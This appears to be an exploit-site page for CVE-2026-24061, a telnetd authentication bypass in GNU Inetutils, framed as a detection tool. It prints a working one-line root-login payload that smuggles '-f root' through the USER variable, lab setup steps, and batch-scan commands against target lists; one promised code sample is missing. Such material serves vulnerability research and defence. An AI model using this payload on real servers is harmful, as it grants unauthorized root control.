## https://sploitus.com/exploit?id=998C395B-F216-5925-B1B5-820670858DFF
# CVE-2026-24061 Vulnerability Detection Tool
> ⚠️ **Note**: `CVE-2026-24061` refers to GNU Inetutils, a classic network toolset provided by the GNU project. This set includes the `telnetd` service, which is a Telnet server daemon. In versions 1.9.3 to 2.7, the `telnetd` service has a fatal flaw in the user authentication process. When this service calls the system’s login program `/usr/bin/login`, it fails to properly filter and validate the `USER` environment variable passed from the client. Attackers can inject the `-f` parameter directly into the `login` command by setting the `USER` variable to `-f root`. The `-f` parameter in the `login` program allows for “skipping additional authentication steps,” enabling attackers to completely bypass all password verification steps and establish remote sessions as the `root` user, thereby gaining full control over the server. This vulnerability is highly dangerous; it represents a publicly available, credentialless remote root backdoor.
## Vulnerability Detection POC
```bash
USER='-f root' telnet -a
```
## Vulnerability Mechanism
The above command sets the `USER` environment variable to `-f root`. When the vulnerable `telnetd` service receives a connection, it constructs and executes a system call similar to the following:
## Steps to Reproduce the Vulnerability
### 1. Install Required Programs
```
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
```
### 2. Uncomment the `telnet` Line (Ensure Correct Format)
```
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
```
### 3. Restart the Service
```
sudo systemctl restart openbsd-inetd
```
### 4. Check Ports
```
sudo ss -tuln | grep ':23'
```
#### 5. Local Test
```
telnet localhost 23
```

## Check Script
### Single Detection
```
python3 cve-2026-24061.py -i 10.10.168.128
```
### Batch Detection
```
python3 cve-2026-24061.py -f targets.txt
```